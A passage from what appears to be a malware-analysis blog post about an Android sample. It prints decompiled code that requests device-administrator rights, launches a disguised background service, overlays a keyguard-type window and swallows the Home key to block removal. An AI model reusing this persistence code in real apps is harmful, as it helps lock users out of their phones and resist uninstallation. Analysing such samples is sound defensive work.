  Intent localIntent = new Intent();
  localIntent.setPackage(debuggerPackageName);
  localIntent.setAction("com.adrt.FIELDS");
  localIntent.putExtra("package", paramString1);
  localIntent.putExtra("path", paramString2);
  localIntent.putExtra("fields", paramArrayList1);
  localIntent.putExtra("fieldValues", paramArrayList2);
  localIntent.putExtra("fieldKinds", paramArrayList3);
  context.sendBroadcast(localIntent);
}
public static void sendLogcatLines(String[] paramArrayOfString)
{
  Intent localIntent = new Intent();
  localIntent.setPackage(debuggerPackageName);
  localIntent.setAction("com.adrt.LOGCAT_ENTRIES");
  localIntent.putExtra("lines", paramArrayOfString);
  context.sendBroadcast(localIntent);
}
Malicious behavior 7: keeping its window on top. When the user tries to revoke the device-administrator authorization ("device performance"), the sample covers the whole screen with an Activity of its own, a lock-screen effect that leaves the phone unusable. InActivity below is the entry point reachable through the googles:// link scheme declared in the manifest; it requests device-administrator rights, starts GoogleLocationService and finishes. Two Gingerbread-era tricks appear in it: setting the window type to 2004 (WindowManager.LayoutParams.TYPE_KEYGUARD) in onAttachedToWindow() let an app receive the Home key on Android 2.x/3.x, and onKeyDown() then swallows key code 3 (KeyEvent.KEYCODE_HOME). Android 4.0 and later no longer deliver Home to apps, but an active device administrator still blocks uninstallation on every version:
import android.app.Activity;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.view.KeyEvent;
import android.view.Window;
public class InActivity extends Activity
{
  private ComponentName a;
  private DevicePolicyManager b;
  private void a() // request device-administrator rights for DeviceReciver (the "activate device performance" dialog)
  {
    this.b = ((DevicePolicyManager)getSystemService("device_policy"));
    this.a = new ComponentName(this, DeviceReciver.class);
    if (!this.b.isAdminActive(this.a))
    {
      Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN"); // DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN
      localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.a);
      startActivity(localIntent);
    }
  }
  private void b() // start the background service that hosts the SMS observer and watchdog
  {
    startService(new Intent(getApplicationContext(), GoogleLocationService.class));
  }
  public void onAttachedToWindow()
  {
    getWindow().setType(2004); // TYPE_KEYGUARD: a system window type that draws over everything and, on Android < 4.0, receives the Home key
    super.onAttachedToWindow();
  }
  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    getWindow().setFlags(-2147483648, -2147483648); // 0x80000000 == FLAG_DRAWS_SYSTEM_BAR_BACKGROUNDS
    a();
    b();
    finish(); // the activity exits at once; the admin dialog and the service remain
  }
  public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent)
  {
    if (paramInt == 3) // KEYCODE_HOME: swallow the Home key
      return true;
    return super.onKeyDown(paramInt, paramKeyEvent);
  }
}
四. Summary
During the analysis I did not look deeper into what the phishing site does; anyone interested can dig into it. I also left out the analysis of how the sample obtains device-administrator rights, mainly because most samples implement it the same way.
In the end I still have not removed the sample from the virtual machine; I have not found a good way to remove it.
If this post helped you, please take a moment to rate it; I would be very grateful!